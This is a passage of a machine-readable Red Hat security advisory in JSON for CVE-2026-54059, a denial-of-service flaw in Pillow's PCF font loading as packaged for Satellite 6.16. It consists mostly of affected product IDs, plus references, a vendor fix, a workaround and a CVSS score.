"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54059"
},
{
"category": "external",
"summary": "RHBZ#2497464",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497464"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54059",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54059"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54059",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54059"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d",
"url": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-8v84-f9pq-wr9x",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-8v84-f9pq-wr9x"
}
],
"release_date": "2026-07-06T18:46:09.433000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T16:04:50+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor detailed instructions how to apply this update, refer to:\n\nhttps://docs.redhat.com/en/documentation/red_hat_satellite/6.16/html/updating_red_hat_satellite/index",
"product_ids": [
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50223"
},
{
"category": "workaround",
"details": "Do not load PCF fonts from untrusted sources. If PCF font loading is required, validate font file dimensions before passing them to Pillow, or upgrade to Pillow 12.3.0 or later which includes the fix for this vulnerability.",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
